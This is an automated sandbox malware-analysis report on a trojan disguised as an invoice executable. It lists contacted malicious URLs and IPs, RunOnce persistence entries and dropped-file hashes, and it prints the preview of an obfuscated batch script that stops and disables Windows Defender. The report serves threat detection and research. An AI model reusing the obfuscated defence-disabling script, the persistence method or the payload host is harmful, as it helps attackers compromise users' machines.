http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0C	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe
http://coroloboxorozor.com/base/563CB4793425B369FD0FAF05E615CF43.html	0%	Avira URL Cloud	safe
http://coroloboxorozor.com/base/EE6EDC43DDDD18D0313D668388B5ECD3.html	0%	Avira URL Cloud	safe
http://coroloboxorozor.com/base/563CB4793425B369FD0FAF05E615CF43	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
coroloboxorozor.com	104.21.71.230	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html	true	Avira URL Cloud: safe	unknown
http://coroloboxorozor.com/base/563CB4793425B369FD0FAF05E615CF43.html	true	Avira URL Cloud: safe	unknown
http://coroloboxorozor.com/base/EE6EDC43DDDD18D0313D668388B5ECD3.html	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.hulu.com/do-not-sell-my-info	svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	false		high
http://ocsp.sectigo.com0	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000F.00000002.941376241.00000000046E2000.00000004.00000001.sdmp	false		high
https://corp.roblox.com/contact/	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
https://go.micro	powershell.exe, 00000008.00000003.848557817.0000000005ADE000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.roblox.com/develop	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
https://instagram.com/hiddencity_	svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://corp.roblox.com/parents/	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
http://coroloboxorozor.com	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.815025294.0000000002B11000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.928658113.0000000002B91000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.939330747.000000000304E000.00000004.00000001.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.hulu.com/ca-privacy-rights	svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	false		high
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hulu.com/privacy	svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	false		high
http://www.g5e.com/G5_End_User_License_Supplemental_Terms	svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	false		high
http://www.hulu.com/terms	svchost.exe, 0000000D.00000003.777811581.0000026432D57000.00000004.00000001.sdmp	false		high
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000F.00000002.941376241.00000000046E2000.00000004.00000001.sdmp	false		high
https://sectigo.com/CPS0C	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://sectigo.com/CPS0D	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.roblox.com/info/privacy	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
http://www.g5e.com/termsofservice	svchost.exe, 0000000D.00000003.780111212.0000026432D6A000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.780227068.0000026432D8B000.00000004.00000001.sdmp	false		high
https://en.help.roblox.com/hc/en-us	svchost.exe, 0000000D.00000003.794313140.0000026432DB6000.00000004.00000001.sdmp, svchost.exe, 0000000D.00000003.793944575.0000026432D83000.00000004.00000001.sdmp	false		high
http://www.nirsoft.net/	AdvancedRun.exe, AdvancedRun.exe, 0000000B.00000000.764051839.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000016.00000002.953175615.0000000003B99000.00000004.00000001.sdmp, AdvancedRun.exe.0.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.815025294.0000000002B11000.00000004.00000001.sdmp, powershell.exe, 0000000F.00000002.939999983.00000000045A1000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.928658113.0000000002B91000.00000004.00000001.sdmp, svchost.exe, 0000001A.00000002.937000226.0000000002FE1000.00000004.00000001.sdmp	false		high
http://coroloboxorozor.com/base/563CB4793425B369FD0FAF05E615CF43	svchost.exe, 0000001A.00000002.937000226.0000000002FE1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.71.230	unknown	United States		13335	CLOUDFLARENETUS	true
172.67.172.17	unknown	United States		13335	CLOUDFLARENETUS	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	355908
Start date:	22.02.2021
Start time:	09:12:32
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 30s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	CN-Invoice-XXXXX9808-19011143287989.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	30
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@28/13@3/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 5.6% (good quality ratio 4.8%) Quality average: 73.1% Quality standard deviation: 35.9%
HCA Information:	Successful, ratio: 90% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 13.107.3.254, 40.88.32.150, 13.107.246.254, 52.255.188.83, 92.122.145.220, 13.88.21.125, 51.104.139.180, 104.43.139.144, 13.107.4.50, 52.155.217.156, 20.54.26.129, 92.122.213.194, 92.122.213.247, 51.104.144.132 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, s-ring.msedge.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, skypedataprdcolcus16.cloudapp.net, s-ring.s-9999.s-msedge.net, t-ring.msedge.net, afdap.au.au-msedge.net, ris.api.iris.microsoft.com, t-9999.t-msedge.net, skypedataprdcoleus17.cloudapp.net, au.au-msedge.net, s-9999.s-msedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, au.c-0001.c-msedge.net, t-ring.t-9999.t-msedge.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:14:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct explorer.exe "C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe"
09:14:20	API Interceptor	10x Sleep call for process: svchost.exe modified
09:14:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce WtdedqepeLXPvCct explorer.exe "C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe"
09:14:35	API Interceptor	1x Sleep call for process: CN-Invoice-XXXXX9808-19011143287989.exe modified
09:14:44	API Interceptor	40x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.21.71.230	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html
172.67.172.17	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/962B8237ABAE559A807528AAAFB9133F.html
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
	INVOICE_47383.EXE	Get hash	malicious	Browse	coroloboxorozor.com/base/0CA40C49A5BD0132BA49F5F7E9A63CBD.html
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse	coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
coroloboxorozor.com	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	172.67.172.17
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	172.67.172.17
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse	104.21.71.230
	INVOICE_47383.EXE	Get hash	malicious	Browse	172.67.172.17
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse	104.21.71.230

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	RE ICA 40 Sdn Bhd- Purchase Order#6769704.exe	Get hash	malicious	Browse	162.159.135.233
	CX2 RFQ.xlsm	Get hash	malicious	Browse	104.16.18.94
	D6ui5xr64I.exe	Get hash	malicious	Browse	23.227.38.74
	7lM8HxwfAm.dll	Get hash	malicious	Browse	104.20.185.68
	LcA7GaqAXC.dll	Get hash	malicious	Browse	104.20.185.68
	4FHOFKHnX8.dll	Get hash	malicious	Browse	104.20.185.68
	5N5yxttthP.dll	Get hash	malicious	Browse	104.20.185.68
	vBKmtJ58Eo.dll	Get hash	malicious	Browse	104.20.185.68
	7R29qUuJef.exe	Get hash	malicious	Browse	104.21.1.113
	RFQ-#09503.exe	Get hash	malicious	Browse	162.159.134.233
	RFQ_1101983736366355 1101938377388.exe	Get hash	malicious	Browse	162.159.130.233
	notice of arrival.xlsx	Get hash	malicious	Browse	172.67.8.238
	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	172.67.172.17
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	172.67.172.17
	Drawings.xlsm	Get hash	malicious	Browse	23.227.38.74
	22-2-2021 .xlsx	Get hash	malicious	Browse	104.22.1.232
	Offer Request 6100003768.exe	Get hash	malicious	Browse	162.159.133.233
	Shipping_Document.xlsx	Get hash	malicious	Browse	104.22.1.232
	SwiftCopyTT.exe	Get hash	malicious	Browse	104.21.19.200
	Remittance copy.xlsx	Get hash	malicious	Browse	172.67.8.238
CLOUDFLARENETUS	CX2 RFQ.xlsm	Get hash	malicious	Browse	104.16.18.94
	D6ui5xr64I.exe	Get hash	malicious	Browse	23.227.38.74
	7lM8HxwfAm.dll	Get hash	malicious	Browse	104.20.185.68
	LcA7GaqAXC.dll	Get hash	malicious	Browse	104.20.185.68
	4FHOFKHnX8.dll	Get hash	malicious	Browse	104.20.185.68
	5N5yxttthP.dll	Get hash	malicious	Browse	104.20.185.68
	vBKmtJ58Eo.dll	Get hash	malicious	Browse	104.20.185.68
	7R29qUuJef.exe	Get hash	malicious	Browse	104.21.1.113
	RFQ-#09503.exe	Get hash	malicious	Browse	162.159.134.233
	RFQ_1101983736366355 1101938377388.exe	Get hash	malicious	Browse	162.159.130.233
	notice of arrival.xlsx	Get hash	malicious	Browse	172.67.8.238
	RFQ CSDOK202040890.exe	Get hash	malicious	Browse	172.67.172.17
	Download_quotation_PR #371073.exe	Get hash	malicious	Browse	172.67.172.17
	Drawings.xlsm	Get hash	malicious	Browse	23.227.38.74
	22-2-2021 .xlsx	Get hash	malicious	Browse	104.22.1.232
	Offer Request 6100003768.exe	Get hash	malicious	Browse	162.159.133.233
	Shipping_Document.xlsx	Get hash	malicious	Browse	104.22.1.232
	SwiftCopyTT.exe	Get hash	malicious	Browse	104.21.19.200
	Remittance copy.xlsx	Get hash	malicious	Browse	172.67.8.238
	CI + PL.xlsx	Get hash	malicious	Browse	172.67.8.238

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Download_quotation_PR #371073.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse
	PurchaseOrdersCSTtyres004786587.exe	Get hash	malicious	Browse
	3zKVfxhs18.exe	Get hash	malicious	Browse
	AWB783079370872.docm	Get hash	malicious	Browse
	DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe	Get hash	malicious	Browse
	CN-Invoice-XXXXX9808-19011143287990.exe	Get hash	malicious	Browse
	Payment Advice 170221.exe	Get hash	malicious	Browse
	Payment Receipt.jar	Get hash	malicious	Browse
	miner.exe	Get hash	malicious	Browse
	875666665.xlsm.xlsm	Get hash	malicious	Browse
	DOCX.doc.doc	Get hash	malicious	Browse
	v.exe	Get hash	malicious	Browse
	uaa.exe	Get hash	malicious	Browse
	r.exe	Get hash	malicious	Browse
	j.exe	Get hash	malicious	Browse
	99.exe	Get hash	malicious	Browse
	m.exe	Get hash	malicious	Browse
	n.exe	Get hash	malicious	Browse
	DdV1LG7bLJ.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CN-Invoice-XXXXX9808-19011143287989.exe.log Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhIE4Ko84G1qE4qXKIE4oKFKHKoZAE4Kzr7FE4j:MxHKXwYHKhQnoIHKovG1qHitHoxHhAHY
MD5:	EA50F64CFBA8AB68863BA174B6FABB73
SHA1:	EFE6A61D221A7DDEE27271613F5FBEAE676254B1
SHA-256:	F97DFD0F7416C33888130B7A06880E3D04CB6F65DDAFCDCE72FA083B0C271711
SHA-512:	A977ABBE32AABA654D968A8C0957059E6CDFC58BD02B9A4E02E61A995578CDBA5FD26A359F09B8506C82D84156658DB22CAC57D3B83B50BD239FB62D26B512D7
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	14734
Entropy (8bit):	4.996142136926143
Encrypted:	false
SSDEEP:	384:SEdVoGIpN6KQkj2Zkjh4iUxZvuiOOdBCNXp5nYoJib4J:SYV3IpNBQkj2Yh4iUxZvuiOOdBCNZlYO
MD5:	B7D3A4EB1F0AED131A6E0EDF1D3C0414
SHA1:	A72E0DDE5F3083632B7242D2407658BCA3E54F29
SHA-256:	8E0EB5898DDF86FE9FE0011DD7AC6711BB0639A8707053D831FB348F9658289B
SHA-512:	F9367BBEC9A44E5C08757576C56B9C8637D8A0A9D6220DE925255888E6A0A088C653E207E211A6796F6A7F469736D538EA5B9E094944316CF4E8189DDD3EED9D
Malicious:	false
Preview:	PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	22308
Entropy (8bit):	5.599056451656148
Encrypted:	false
SSDEEP:	384:NtCDT0oNdT0QY2cw4+0jul6o3D7Y9gxSJUeRe1BMrmEZSRV7AjKZf64I+9g:AJ7Yfw4VClP33xXeNZAcWs
MD5:	3CA1D2A5767EA8E44BE53C55B4508377
SHA1:	36EE306B58038093AF90DC1D00FA9A88FF526359
SHA-256:	177CFA2E61AB8BF0008636E8E2856E256A097FA644714E402481E4A03B0A88C1
SHA-512:	2653DA30F52CD0AA9D4F9FCEF314E813D435263AEA2B20117FD7B38882AD90ABAC2BFFA2F6CD91B4A4124047C17C7731862EAAF8915F2241313B474476D732E7
Malicious:	false
Preview:	@...e.....................%.............,............@..........H...............<@.^.L."My...:R..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	91000
Entropy (8bit):	6.241345766746317
Encrypted:	false
SSDEEP:	1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
MD5:	17FC12902F4769AF3A9271EB4E2DACCE
SHA1:	9A4A1581CC3971579574F837E110F3BD6D529DAB
SHA-256:	29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
SHA-512:	036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Download_quotation_PR #371073.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse Filename: PurchaseOrdersCSTtyres004786587.exe, Detection: malicious, Browse Filename: 3zKVfxhs18.exe, Detection: malicious, Browse Filename: AWB783079370872.docm, Detection: malicious, Browse Filename: DETALLE DE TRANSFERENCIA BANCO AGRARO DE COLOMBIA.exe, Detection: malicious, Browse Filename: CN-Invoice-XXXXX9808-19011143287990.exe, Detection: malicious, Browse Filename: Payment Advice 170221.exe, Detection: malicious, Browse Filename: Payment Receipt.jar, Detection: malicious, Browse Filename: miner.exe, Detection: malicious, Browse Filename: 875666665.xlsm.xlsm, Detection: malicious, Browse Filename: DOCX.doc.doc, Detection: malicious, Browse Filename: v.exe, Detection: malicious, Browse Filename: uaa.exe, Detection: malicious, Browse Filename: r.exe, Detection: malicious, Browse Filename: j.exe, Detection: malicious, Browse Filename: 99.exe, Detection: malicious, Browse Filename: m.exe, Detection: malicious, Browse Filename: n.exe, Detection: malicious, Browse Filename: DdV1LG7bLJ.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....).....)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat Download File
Process:	C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	8399
Entropy (8bit):	4.665734428420432
Encrypted:	false
SSDEEP:	192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
MD5:	B2A5EF7D334BDF866113C6F4F9036AAE
SHA1:	F9027F2827B35840487EFD04E818121B5A8541E0
SHA-256:	27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
SHA-512:	8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
Malicious:	false
Preview:	@%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eh4satsn.nas.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgcjqlgh.pwd.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
